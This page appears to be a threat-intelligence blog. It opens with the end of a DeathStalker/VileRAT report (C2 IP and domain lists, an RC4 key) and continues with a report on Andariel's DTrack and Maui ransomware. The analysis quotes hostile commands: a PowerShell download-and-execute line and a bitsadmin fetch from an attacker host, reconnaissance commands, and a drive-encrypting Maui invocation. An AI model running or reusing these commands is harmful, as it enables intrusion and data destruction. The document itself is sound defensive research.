6E79535F38248C7769365881C577DF29

C2 IP addresses 185.161.208[.]172 2022-07, and 2021-06 to 07 at least 185.161.208[.]207 2022-07 at least 185.161.209[.]87 2022-06 at least 185.161.208[.]209 2022-05 to 06 at least 185.161.208[.]20 2022-04 to 06 at least 185.161.208[.]225 2022-03 to 04 at least 185.236.76[.]230 2022-03 to 04 at least 185.236.76[.]30 2022-03 at least 185.236.76[.]34 2022-03 at least 185.161.209[.]223 2022-01 to 02 at least 185.161.209[.]28 2022-01 to 02 at least 185.161.208[.]166 2021-12 to 2022-01 at least 185.161.208[.]182 2021-12 at least 185.161.209[.]97 2021-11 and 08 at least 185.236.76[.]21 2021-11 at least 185.161.209[.]117 2021-10 at least 185.161.208[.]64 2021-10 at least 185.161.208[.]194 2021-09 to 10 at least 185.161.209[.]170 2021-09 at least 185.161.208[.]160 2021-07 to 09 at least 193.56.28[.]201 2020-07 at least 185.236.230[.]25 2020-07 at least C2 domain names

Note: the C2 domain names have been identified in our own telemetry or extracted from malicious files that are described in this article and that we analyzed. The domains may still have previously (or later) been used for legitimate purposes as domains may get reused over time. Even if we could not notice such a conflict up to now, the resolution of a hostname that belongs to such domain must better be checked to match previously listed C2 IP addresses, before concluding it is indicative of a compromise.

rowfus[.]com
shopadvs[.]com
svclouds[.]com
corstand[.]com
getappcloud[.]com
hostboxapp[.]com
weareukrainepeople[.]com
eroeurovc[.]com
flightpassist[.]com
ihotel-deals[.]com
mevcsft[.]com
msfsvctassist[.]com
pinktwinlers[.]com
plantgrn[.]com
wazalpne[.]com
affijay[.]com
upservicemc[.]com
msfbckupsc[.]com
estimefm[.]org
visitaustriaislands[.]com
bookaustriavisit[.]com
hubflash[.]co
bookingitnow[.]org
planetjib[.]com
enigmadah[.]com
qeliabhat[.]com
qnmarry[.]com
pngdoma[.]com
robmkg[.]com
textmaticz[.]com
goalrom[.]com
deltacldll[.]com
nortonalytics[.]com
udporm[.]com
dellscanhw[.]com
mailcloudservices[.]org
hpcloudlive[.]com
windowslive-detect[.]com
zummaride[.]com
cashcores[.]org
thesailormaid[.]com
multizoom[.]org
poccodom[.]com
msftmnvm[.]com
plancetron[.]com
covidsrc[.]com
covidsvcrc[.]com
msftcd[.]com
rombaic[.]com
cargoargs[.]com
amazoncld[.]com
printauthors[.]com
amznapis[.]com
thismads[.]com
ammaze[.]org
eroclasp[.]com
mullticon[.]com
audio-azure[.]com
azure-affiliate[.]com
service-azure[.]com
scan-eset[.]com
check-avg[.]com
adsmachineio[.]com
api-pixtools[.]com
api-printer-spool[.]com
driver-wds[.]com
flowerads[.]cloud
globaladdressbook[.]cloud
msft-cdn[.]cloud
windows-accs[.]live
windows-ddnl[.]com
freepbxs[.]com
trvol[.]com
trvolume[.]net
corpxtech[.]com
veritechx[.]com
vvxtech[.]net
extrasectr[.]com
trquotesys[.]com
quotingtrx[.]com
booknerfix[.]com
bgamifieder[.]com
book-advp[.]com
netwebsoc[.]com
refinance-ltd[.]com
windnetap[.]com
n90app[.]com
appdllsvc[.]com
meetomoves[.]com
moretraveladv[.]com
hostedl[.]com
agagian[.]com
informaxima[.]org
polanicia[.]com
am-reader[.]com
liongracem[.]com
jmarrycs[.]com
worldchangeos[.]com
gvgnci[.]com
ananoka[.]com
netpixelds[.]com
allmyad[.]com
wicommerece[.]com
showsvc[.]com
borisjns[.]com
govdefi[.]com
dogeofcoin[.]com
realshbe[.]com
questofma[.]com
covidgov[.]org
govtoffice[.]org
covidaff[.]org
covsafezone[.]com
msftinfo[.]com
invgov[.]org
anypicsave[.]com
navyedu[.]org
anyfoodappz[.]com
cloudazureservices[.]com
dnserviceapp[.]com
picodehub[.]com
musthavethisapp[.]com
refsurface[.]com
amazoncontent[.]org
wizdomofdo[.]com
tomandos[.]com
amazonappservice[.]com
amzncldn[.]com
azurecontents[.]com
philipfin[.]com
cloudhckpoint[.]com
checkpoint-ds[.]com
iteamates[.]com
global-imsec[.]com
printfiledn[.]com
msftprintsvc[.]com
worldsiclock[.]com
deuoffice[.]org
amazonpmnt[.]com
alipayglobal[.]org
cloudamazonft[.]com
apple-sdk[.]com
azurecfd[.]com
apiygate[.]com
msftcrs[.]com
sysconfwmi[.]com
dnstotal[.]org
namereslv[.]org
mailservicenow[.]com
cloudreg-email[.]com
apidevops[.]org
zerobitfan[.]com
edwardpof[.]com
mainsingular[.]com
totaledgency[.]com
admex[.]org
outlookfnd[.]com
bookfinder-ltd[.]com
earthviehuge[.]com
estoniaforall[.]com
jarviservice[.]org
moreofestonia[.]com
traveladvnow[.]com
tripadvit[.]com
advideoc[.]org
auzebook[.]com
mslogger[.]org
netmsvc[.]com
ntlmsvc[.]com
prodeload[.]com
realmacblog[.]com
roblexmeet[.]com
weatherlocate[.]com
crm-domain[.]net
leads-management[.]net
voipasst[.]com
voipreq12[.]com
voipssupport[.]com
telefx[.]net

Suspected C2 domain names

Note: the suspected C2 domain names have been identified because they were both registered in a similar way than known C2 domain names, AND because associated hostnames pointed to known C2 IP addresses during a timeframe of known malicious activity. While we believe with medium to high confidence the vast majority of these domains have been or could be leveraged by DeathStalker, it is still possible that a few of them never support malicious activities.

adsoftpic[.]com
azcloudazure[.]com
azureservicesapi[.]com
diamondncenter[.]biz
forceground[.]co
multitrolli[.]com
searchvpics[.]com
superimarkets[.]com
symantecq[.]com
yorkccity[.]com
cosmoscld[.]com
oglmart[.]com
shopamzn[.]org
aidobe-update[.]com
amzn-services[.]com
applecloudnz[.]com
esetupdater[.]com
fastnetbrowsing[.]com
findmypcs[.]com
flyingpackagetrack[.]com
mcafee-secd[.]com
msfastbrowse[.]com
murfyslaws[.]com
networkcanner[.]com
nvidiaupdater[.]com
oauth-azure[.]com
oautho[.]com
orbiz[.]me
outlooksyn[.]com
pdfscan-now[.]com
soundstuner[.]com
timetwork[.]com
wingsnsun[.]com
azuredllservices[.]com
mailgunltd[.]com
officelivecloud[.]com
kgcharles[.]com
mstreamvc[.]com
streamsrvc[.]com
walltoncse[.]org
wldbooks[.]com
travelbooknow[.]org
amzbooks[.]org
atomarket[.]org
elitefocuc[.]com
futureggs[.]com
newedgeso[.]com
topotato[.]org
wwcsport[.]org
firedomez[.]com
gratedomofrome[.]com
servicebu[.]org
servicejap[.]com
appcellor[.]com
cloud-appint[.]com
coreadvc[.]com
sellcoread[.]com
allrivercenter[.]com
missft[.]com
onesportinc[.]com
tophubbyriver[.]com
yourprintllc[.]com
azuredcloud[.]com
bingapianalytics[.]com
mscloudin[.]com
msdllopt[.]com
netrcmapi[.]com
pcamanalytics[.]com
dbcallog[.]com
msft-dev[.]com
msftapp[.]com
msftprint[.]com
msintsvc[.]com
praxpay[.]org
print-hpcloud[.]com
svcscom[.]com
unitedubai[.]org
unitepixel[.]org
advflat[.]com
cloudappcer[.]com
cloudpdom[.]com
dustforms[.]com
econfuss[.]com
ezteching[.]com
infntio[.]com
luccares[.]com
orklaus[.]com
roboecloud[.]com
wdigitalecloud[.]com
advertbart[.]com
bunflun[.]com
covdd[.]org
inetp-service[.]com
infcloudnet[.]com
khnga[.]com
mailservice-ns[.]com
webinfors[.]com
yomangaw[.]com
azueracademy[.]com
cyphschool[.]com
imagegyne[.]com
imageztun[.]com
netoode[.]com
olymacademy[.]com
pivotnet[.]org
fxmt4x[.]com
telecomwl[.]com
xlmfx[.]com

[1] This is an expected result from the standard CPython build chain: the build configuration will automatically tag a binary with such version naming if compilation is done from sources that do not match a defined tag (for instance, 3.7.4) or are modified.

[2] All JSON dictionaries required by commands are URL-encoded, base64-encoded, and RC4-encrypted with a base64-encoded RC4 key of “XMpPrh70/0YsN3aPc4Q4VmopzKMGvhzlG4f6vk4LKkI=” (starting from VileRAT 3.0; previous samples use a different key).

2022. augusztus 9.

Andariel deploys DTrack and Maui ransomware

On July 7, 2022, the CISA published an alert, entitled, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector,” related to a Stairwell report, “Maui Ransomware.” Later, the Department of Justice announced that they had effectively clawed back $500,000 in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.

We extend their “first seen” date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.

While CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.

Background

We observed the following timeline of detections from an initial target system:

  1. 2020-12-25 Suspicious 3proxy tool
  2. 2021-04-15 DTrack malware
  3. 2021-04-15 Maui ransomware
DTrack malware MD5 739812e2ae1327a94e441719b885bd19 SHA1 102a6954a16e80de814bee7ae2b893f1fa196613 SHA256 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 Link time 2021-03-30 02:29:15 File type PE32 executable (GUI) Intel 80386, for MS Windows Compiler VS2008 build 21022 File size 1.2 MB File name C:\Windows\Temp\temp\mvhost.exe

Once this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. The in-memory payload executes the following Windows commands:

"C:\Windows\system32\cmd.exe" /c ipconfig /all > "%Temp%\temp\res.ip" "C:\Windows\system32\cmd.exe" /c tasklist > "%Temp%\temp\task.list" "C:\Windows\system32\cmd.exe" /c netstat -naop tcp > "%Temp%\temp\netstat.res" "C:\Windows\system32\cmd.exe" /c netsh interface show interface > "%Temp%\temp\netsh.res" "C:\Windows\system32\cmd.exe" /c ping -n 1 8.8.8.8 > "%Temp%\temp\ping.res"

In addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.

Maui ransomware

The Maui ransomware was detected ten hours after the DTrack variant on the same server.

MD5 ad4eababfe125110299e5a24be84472e SHA1 94db86c214f4ab401e84ad26bb0c9c246059daff SHA256 a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa Link time 2021-04-15 04:36:00 File type PE32 executable (GUI) Intel 80386, for MS Windows File size 763.67 KB  File name C:\Windows\Temp\temp\maui.exe

Multiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using “-t” and “- x” arguments, along with a specific drive path to encrypt:

C:\Windows\Temp\temp\bin\Maui.exe -t 8 -x E:

In this case, “-t 8” sets the ransomware thread count to eight, “-x” commands the malware to “self melt”, and the “E:” value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as described in the Stairwell report.

The malware created two key files to implement file encryption:

RSA private key C:\Windows\Temp\temp\bin\Maui.evd RSA public key C:\Windows\Temp\temp\bin\Maui.key Similar DTrack malware on different victims

Pivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.

MD5 f2f787868a3064407d79173ac5fc0864 SHA1 1c4aa2cbe83546892c98508cad9da592089ef777 SHA256 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae Link time 2021-02-22 05:36:16 File type PE32 executable (GUI) Intel 80386, for MS Windows File size 848 KB

The primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.

Windows commands to exfiltrate data

From the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.

Additional DTrack module and initial infection method

The “3Proxy” tool, likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on 2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an additional DTrack module. This module was compiled 2020-09-16 14:16:21 and detected in early December 2020, having a similar timeline to the 3Proxy tool deployment.

MD5 cf236bf5b41d26967b1ce04ebbdb4041 SHA1 feb79a5a2bdf0bcf0777ee51782dc50d2901bb91 SHA256 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145 Link time 2020-09-16 14:16:21 File type PE32 executable (GUI) Intel 80386, for MS Windows Compiler VS2008 build 21022 File size 136 KB File name %appdata%\microsoft\mmc\dwem.cert

This DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our Threat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, HFS7, had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and “whoami” was executed, the Powershell command below was executed to fetch an additional Powershell script from the remote server:

C:\windows\system32\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')

The mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:

bitsadmin.exe /transfer myJob /download /priority high "hxxp://145.232.235[.]222/usr/users/dwem.cert" "%appdata%\microsoft\mmc\dwem.cert"

The other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this server via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the exploited server executes the Powershell command to fetch the additional script. The fetched script is capable of downloading a Powershell script from the server we mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1). Therefore, we can summarize that the actor abused vulnerable Internet-facing services to deploy their malware at least until the end of 2020.

Victims

The July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui ransomware within the US. However, based on our research, we believe this operation does not target specific industries and that its reach is global. We can confirm that the Japanese housing company was targeted with the Maui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar timeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early 2021.

Our research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the Andariel deployed ransomware selectively to make financial profits.

Attribution

According to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a high degree of code similarity (84%) with previously known DTrack malware.

Also, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same shellcode loader as “Backdoor.Preft” malware (MD5 2f553cba839ca4dab201d3f8154bae2a), published/reported by Symantec – note that Symantec recently described the Backdoor.Preft malware as “aka Dtrack, Valefor”. Apart from the code similarity, the actor used 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool was also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5 95247511a611ba3d8581c7c6b8b1a38a). Symantec attributes StoneFly as the North Korean-linked actor behind the DarkSeoul incident.

Conclusions

Based on the modus operandi of this attack, we conclude that the actor’s TTPs behind the Maui ransomware incident is remarkably similar to past Andariel/Stonefly/Silent Chollima activity:

  • Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and using Powershell scripts and Bitsadmin to download additional malware;
  • Using exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;
  • Exclusively deploying DTrack, also known as Preft;
  • Dwell time within target networks can last for months prior to activity;
  • Deploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest